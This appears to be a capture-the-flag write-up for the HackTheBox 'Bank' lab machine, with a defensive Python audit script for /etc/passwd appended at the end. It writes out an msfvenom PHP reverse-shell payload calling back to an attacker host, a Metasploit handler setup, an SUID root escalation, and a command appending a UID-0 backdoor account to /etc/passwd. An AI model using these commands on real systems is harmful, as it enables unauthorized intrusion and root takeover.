HackTheBox Bank
Writeup for HackTheBox Bank
Machine Synopsis
Bank is a relatively simple machine, however proper web enumeration is key to finding the necessary data for entry. (Source)
Enumeration
```
$ nmap -sC -sV -A 10.10.10.29
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
| 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
| 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
```
Website
It seems we need to add the hostname to our /etc/hosts file.
```
$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 Shiro.Blank Shiro
10.10.10.29 bank.htb
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
```
Now, we should be able to view the website.
Let's run gobuster to brute-force the possible URLs on the website (use the flag -x php because the website runs PHP).
```
$ gobuster dir --url http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 50
...
/support.php (Status: 302)
/uploads (Status: 301)
/assets (Status: 301)
/logout.php (Status: 302)
/login.php (Status: 200)
/index.php (Status: 302)
/inc (Status: 301)
/server-status (Status: 403)
/balance-transfer (Status: 301)
...
```
Let's visit the /balance-transfer/ page and sort it by size.
Notice that one file is noticeably smaller than the others.
We can log in to the web app using the credentials found in it.
Inspecting the page source shows that we should use the .htb extension.
Exploitation
Generate a PHP reverse shell with the .htb extension using msfvenom.
```
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=1234 -f raw > exploit.htb
```
Then upload the file to the website, start msfconsole, and execute the PHP file.
```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > set AUTORUNSCRIPT post/windows/manage/migrate
AUTORUNSCRIPT => post/windows/manage/migrate
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
...
[*] Meterpreter session 1 opened (10.10.14.2:1234 -> 10.10.10.29:35630) at 2021-05-29 14:54:01 +0800
meterpreter > shell
Process 1512 created.
Channel 0 created.
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")' # https://netsec.ws/?p=337
www-data@bank:/var/www/bank/uploads$
```
Privilege Escalation
Let's search for all SUID binaries owned by root.
- / : search all subdirectories of / (the entire file system)
- -type f : only return files
- -user root : only return files owned by root
- -perm -4000 : only return files with the SUID bit set
- 2>/dev/null : don't show errors
```
www-data@bank:/var/www/bank/uploads$ find / -type f -user root -perm -4000 2>/dev/null
/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
...
```
We found an interesting binary, /var/htb/bin/emergency, so let's try running it.
```
www-data@bank:/var/www/bank/uploads$ /var/htb/bin/emergency
#
# whoami
root
# cat /home/chris/user.txt
c81ee9df3751ccf82b64af3046a3269a
# cat /root/root.txt
e92b13e6ff0dd9361add88e07b6687c9
```
Alternative Privilege Escalation
Another way of getting root is to exploit the world-writable /etc/passwd file.
```
# ls -l /etc/passwd /etc/shadow
ls -l /etc/passwd /etc/shadow
-rw-rw-rw- 1 root root 1252 May 28 2017 /etc/passwd
-rw-r----- 1 root shadow 895 Jun 14 2017 /etc/shadow
```
Then generate a password hash for the password "shiro" using openssl. Note that -1 generates an MD5 hash, -5 a SHA256 hash and -6 a SHA512 hash.
```
# openssl passwd -1 shiro
openssl passwd -1 shiro
$1$pOJIRjNf$gJAUfsAmmuY1XUuud4ink/
```
Then add a line to /etc/passwd using echo in this format:
username:password:userid:groupid:comment:homedirectory:shell
```
# echo 'shiro:$1$pOJIRjNf$gJAUfsAmmuY1XUuud4ink/:0:0:pwned:/root:/bin/bash' >> /etc/passwd
echo 'shiro:$1$pOJIRjNf$gJAUfsAmmuY1XUuud4ink/:0:0:pwned:/root:/bin/bash' >> /etc/passwd
# su - shiro
su - shiro
Password: shiro
root@bank:~#
```
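As an added defender-side example (not part of the original writeup), here is a small Python audit that parses /etc/passwd using the field layout above and flags the two traces this technique leaves behind: a second UID-0 account and a password hash stored in passwd instead of shadow. It also checks for the group/world-writable mode shown in the ls output. The sample passwd content is constructed; the shiro line is the one appended in the writeup.

```python
import os
import stat

# Field layout of an /etc/passwd line, as described in the writeup:
# username:password:userid:groupid:comment:homedirectory:shell
PASSWD_FIELDS = ("name", "password", "uid", "gid", "comment", "home", "shell")

# Constructed sample: a normal file plus the backdoor line the writeup appends.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
chris:x:1000:1000:chris,,,:/home/chris:/bin/bash
shiro:$1$pOJIRjNf$gJAUfsAmmuY1XUuud4ink/:0:0:pwned:/root:/bin/bash
"""

def parse_passwd(text):
    """Split passwd text into one dict per entry; malformed lines are flagged."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != len(PASSWD_FIELDS):
            entries.append({"line": lineno, "malformed": True, "raw": line})
            continue
        entry = dict(zip(PASSWD_FIELDS, parts))
        entry.update(line=lineno, malformed=False)
        entries.append(entry)
    return entries

def audit_passwd(text):
    """Return (line number, finding) pairs for entries that indicate tampering."""
    findings = []
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append((e["line"], "malformed entry"))
            continue
        # A second UID-0 account is the classic sign of this escalation.
        if e["uid"] == "0" and e["name"] != "root":
            findings.append((e["line"], f"non-root account {e['name']!r} has UID 0"))
        # Anything but a shadow placeholder means the hash lives in passwd itself.
        if e["password"] not in ("x", "*", "!", "!!", ""):
            findings.append((e["line"], f"{e['name']!r} has a password hash in /etc/passwd"))
    return findings

def passwd_is_writable_by_others(path="/etc/passwd"):
    """True if group or world write bits are set (the misconfiguration on Bank)."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

if __name__ == "__main__":
    for line, msg in audit_passwd(SAMPLE_PASSWD):
        print(f"line {line}: {msg}")
```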